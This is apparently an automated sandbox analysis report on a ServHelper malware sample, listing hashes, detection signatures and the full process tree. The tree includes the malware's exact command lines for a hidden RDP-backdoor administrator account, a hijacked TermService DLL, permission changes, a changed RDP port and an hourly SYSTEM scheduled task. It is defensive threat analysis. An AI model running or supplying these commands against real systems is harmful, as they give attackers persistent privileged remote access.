Analysis
- max time kernel: 78s
- max time network: 158s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 01-07-2022 14:14
Static task: static1
Behavioral task: behavioral1
- Sample: b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
- Resource: win10v2004-20220414-en
General
- Target: b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
- Size: 2.9MB
- MD5: cc47bc788a58c510b00a5b288769a943
- SHA1: 184478b1e91d3354f5981c19e615bec766c38fab
- SHA256: b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e
- SHA512: ddf966d08c8de80ff86f222a4b794d9b0afeb3a1c88070452d086a3e61b8e8c0d65b40afbd2c28f1c0ca9d8f3947a1d9d485177290e0a745091908337dd0e1e6
Malware Config
Signatures
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
pid | process
1652 | takeown.exe
1876 | icacls.exe
3360 | icacls.exe
904 | icacls.exe
2352 | icacls.exe
4624 | icacls.exe
3524 | icacls.exe
4120 | icacls.exe
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "%SystemRoot%\\help\\tmp5211.dat" | reg.exe
-
Processes:
resource | yara_rule
C:\Windows\Help\tmp5212.dat | upx
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
-
Loads dropped DLL 7 IoCs
Processes:
pid | process
4108 | b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
4108 | b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
4108 | b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
4108 | b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
4108 | b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
4932 |
4932 |
-
Modifies file permissions 1 TTPs 8 IoCs
Processes:
pid | process
1652 | takeown.exe
1876 | icacls.exe
3360 | icacls.exe
904 | icacls.exe
2352 | icacls.exe
4624 | icacls.exe
3524 | icacls.exe
4120 | icacls.exe
-
Drops file in System32 directory 1 IoCs
Processes:
description | ioc | process
File created | C:\Windows\system32\rfxvmt.dll | powershell.exe
-
Drops file in Windows directory 3 IoCs
Processes:
description | ioc | process
File created | C:\Windows\help\tmp5211.dat | powershell.exe
File created | C:\Windows\help\tmp5212.dat | powershell.exe
File created | C:\Windows\help\tmp5213.dat | powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
pid | process
3204 | powershell.exe
3204 | powershell.exe
3204 | powershell.exe
3204 | powershell.exe
3204 | powershell.exe
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid | process
648 |
648 |
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3204 | powershell.exe
Token: SeRestorePrivilege | 3360 | icacls.exe
-
Suspicious use of WriteProcessMemory 58 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe
"C:\Users\Admin\AppData\Local\Temp\b230e191857ee2dcb34b7fb163bcfbda42a31d0c0be5f1c93f4b0057a2bf2c3e.exe" 1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps1 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps1 3⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll 4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d 4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller" 4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F" 4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM" 4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX" 4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators 4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX 4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f 4⤵
-
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\tmp5211.dat /f 4⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add 4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add 5⤵
-
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f 4⤵
-
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f 4⤵
-
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del 1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del 3⤵
-
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc ZfSH0CwA /add 1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc ZfSH0CwA /add 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc ZfSH0CwA /add 3⤵
-
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD 1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD 3⤵
-
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD 1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD 3⤵
-
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD 1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD 3⤵
-
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc ZfSH0CwA 1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc ZfSH0CwA 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc ZfSH0CwA 3⤵
-
C:\Windows\System32\cmd.exe
cmd /C schtasks /create /tn 87383 /tr "powershell -nop -ep bypass -f c:\windows\help\79972.ps1" /ru system /sc hourly /mo 1 1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe
schtasks /create /tn 87383 /tr "powershell -nop -ep bypass -f c:\windows\help\79972.ps1" /ru system /sc hourly /mo 1 2⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\HVQIJGCGDZHVQIJGCGDZHVQIJGCGDZ.ps1
Filesize: 3.5MB
-
C:\Users\Admin\AppData\Local\Temp\changes_7521tg.txt
Filesize: 102B
-
C:\Users\Admin\AppData\Local\Temp\nsbD72C.tmp\System.dll
Filesize: 11KB
-
C:\Users\Admin\AppData\Local\Temp\nsbD72C.tmp\blowfish.dll
Filesize: 22KB
-
C:\Windows\Help\tmp5211.dat
Filesize: 116KB
-
C:\Windows\Help\tmp5212.dat
Filesize: 784KB
-
C:\Windows\system32\rfxvmt.dll
Filesize: 40KB